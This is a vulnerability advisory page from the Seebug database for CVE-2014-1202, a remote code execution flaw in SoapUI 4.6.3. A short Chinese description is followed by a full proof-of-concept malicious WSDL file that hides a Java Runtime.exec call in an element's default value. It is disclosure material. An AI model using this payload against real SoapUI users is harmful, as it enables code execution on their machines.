Lucene search
RootSSV:61328HistoryJan 16, 2014 - 12:00 a.m.
SoapUI远程代码执行漏洞
2014-01-1600:00:00
Root
www.seebug.org
23
EPSS
0.73
Percentile
98.1%
CVE ID: CVE-2014-1202
SoapUI是免费和开放源码的跨平台功能测试解决方案。
攻击者可以使恶意的WSDL文件,确定被请求参数中的一个恶意Java代码为默认值。当客户端使用恶意的WSDL文件,并会尝试发送一个请求时,java代码将被执行。
0
SoapUI 4.6.3
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.soapui.org/
<?xml version="1.0"?>
<definitions name="StockQuote"
targetNamespace="http://example.com/stockquote.wsdl"
xmlns:tns="http://example.com/stockquote.wsdl"
xmlns:xsd1="http://example.com/stockquote.xsd"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns="http://schemas.xmlsoap.org/wsdl/">
<types>
<schema targetNamespace="http://example.com/stockquote.xsd"
xmlns="http://www.w3.org/2000/10/XMLSchema">
<element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="string">
<complexType>
<all>
<element name="tickerSymbol" type="string"/>
</all>
</complexType>
</element>
<element name="TradePrice">
<complexType>
<all>
<element name="price" type="float"/>
</all>
</complexType>
</element>
</schema>
</types>
<message name="GetLastTradePriceInput">
<part name="body" element="xsd1:Payload"/>
</message>
<message name="GetLastTradePriceOutput">
<part name="body" element="xsd1:TradePrice"/>
</message>
<portType name="StockQuotePortType">
<operation name="Malicious_Request">
<input message="tns:GetLastTradePriceInput"/>
<output message="tns:GetLastTradePriceOutput"/>
</operation>
</portType>
<binding name="Exploit" type="tns:StockQuotePortType">
<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="Malicious_Request">
<soap:operation soapAction="http://example.com/GetLastTradePrice"/>
<input>
<soap:body use="literal"/>
</input>
<output>
<soap:body use="literal"/>
</output>
</operation>
</binding>
<service name="StockQuoteService">
<documentation>My first service</documentation>
<port name="StockQuotePort" binding="tns:StockQuoteSoapBinding">
<soap:address location="http://example.com/stockquote"/>
</port>
</service>
</definitions>
Related
packetstorm
packetstorm
SoapUI Remote Code Execution
2014-01-14 00:00:00
checkpoint_advisories
checkpoint_advisories
SOAPUI Remote Code Execution - Ver2 (CVE-2014-1202)
2015-03-26 00:00:00
prion
prion
Code injection
2014-01-25 01:55:00
zdt
zdt
SoapUI 4.6.3 - Remote Code Execution Vulnerability
2014-01-14 00:00:00
cvelist
cvelist
CVE-2014-1202
2014-01-25 01:00:00
exploitpack
exploitpack
SoapUI 4.6.3 - Remote Code Execution
2014-01-14 00:00:00
cve
cve
CVE-2014-1202
2014-01-25 01:55:05
seebug
seebug
SoapUI 4.6.3 - Remote Code Execution
2014-07-01 00:00:00
exploitdb
exploitdb
SoapUI 4.6.3 - Remote Code Execution
2014-01-14 00:00:00
osv
osv
Code injection via property expansion in SoapUI
2022-05-17 04:53:43
nvd
nvd
CVE-2014-1202
2014-01-25 01:55:05
github
github
Code injection via property expansion in SoapUI
2022-05-17 04:53:43